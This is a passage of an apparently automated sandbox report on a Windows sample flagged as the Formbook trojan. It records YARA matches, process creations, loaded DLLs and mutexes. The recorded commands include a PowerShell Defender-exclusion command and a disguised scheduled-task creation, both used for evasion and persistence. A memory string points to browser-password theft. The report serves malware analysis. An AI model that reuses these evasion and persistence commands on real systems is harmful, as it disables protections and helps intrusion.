            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0115EFA013_2_0115EFA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010D2FC813_2_010D2FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E0E5913_2_010E0E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010F2E9013_2_010F2E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E9EB013_2_010E9EB0
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeCode function: 16_2_03296BC816_2_03296BC8
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeCode function: 16_2_0328E11816_2_0328E118
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeCode function: 16_2_0328495916_2_03284959
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeCode function: 16_2_0329009816_2_03290098
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeCode function: 16_2_0328FE6F16_2_0328FE6F
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeCode function: 16_2_0328FE7816_2_0328FE78
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeCode function: 16_2_032AE64816_2_032AE648
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01127E54 appears 96 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0114EA12 appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01537E54 appears 99 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0155EA12 appears 86 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01525130 appears 58 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 014DB970 appears 262 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0156F290 appears 103 times
            Source: JeouiaPf03mHSBH.exeStatic PE information: invalid certificate
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777152798.00000000063E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMML.dll2 vs JeouiaPf03mHSBH.exe
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1772198461.00000000045FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs JeouiaPf03mHSBH.exe
            Source: JeouiaPf03mHSBH.exe, 00000000.00000000.1669536601.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRAwd.exe: vs JeouiaPf03mHSBH.exe
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1771673685.0000000003421000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMML.dll2 vs JeouiaPf03mHSBH.exe
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1769943493.000000000143E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs JeouiaPf03mHSBH.exe
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1778920802.0000000009860000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs JeouiaPf03mHSBH.exe
            Source: JeouiaPf03mHSBH.exeBinary or memory string: OriginalFilenameRAwd.exe: vs JeouiaPf03mHSBH.exe
            Source: JeouiaPf03mHSBH.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.2925725443.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.2925650588.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2095784893.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000012.00000002.2925371648.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2097970125.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000013.00000002.2448787756.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.2923647911.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000014.00000002.2925569784.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2098515296.00000000023F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.2345762971.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.2925655670.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: JeouiaPf03mHSBH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: snTlRrBza.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, Ckc4Bt89d71YMmb0gd.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, Ckc4Bt89d71YMmb0gd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, Ckc4Bt89d71YMmb0gd.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, upI346SlGxxHgqWU2Z.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, Ckc4Bt89d71YMmb0gd.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, Ckc4Bt89d71YMmb0gd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, Ckc4Bt89d71YMmb0gd.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, upI346SlGxxHgqWU2Z.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, Ckc4Bt89d71YMmb0gd.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, Ckc4Bt89d71YMmb0gd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, Ckc4Bt89d71YMmb0gd.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, upI346SlGxxHgqWU2Z.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/12@5/4
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeFile created: C:\Users\user\AppData\Roaming\snTlRrBza.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeMutant created: \Sessions\1\BaseNamedObjects\WhLpISOH
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA933.tmpJump to behavior
            Source: JeouiaPf03mHSBH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: JeouiaPf03mHSBH.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: SearchIndexer.exe, 00000011.00000002.2924136902.0000000002B14000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2464414597.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2464648659.0000000002B14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeFile read: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe:Zone.IdentifierJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe "C:\Users\user\Desktop\JeouiaPf03mHSBH.exe"
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\snTlRrBza.exe C:\Users\user\AppData\Roaming\snTlRrBza.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpCEDB.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeProcess created: C:\Windows\SysWOW64\SearchIndexer.exe "C:\Windows\SysWOW64\SearchIndexer.exe"
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeProcess created: C:\Windows\SysWOW64\SearchIndexer.exe "C:\Windows\SysWOW64\SearchIndexer.exe"
            Source: C:\Windows\SysWOW64\SearchIndexer.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe"Jump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpCEDB.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeProcess created: C:\Windows\SysWOW64\SearchIndexer.exe "C:\Windows\SysWOW64\SearchIndexer.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeProcess created: C:\Windows\SysWOW64\SearchIndexer.exe "C:\Windows\SysWOW64\SearchIndexer.exe"Jump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
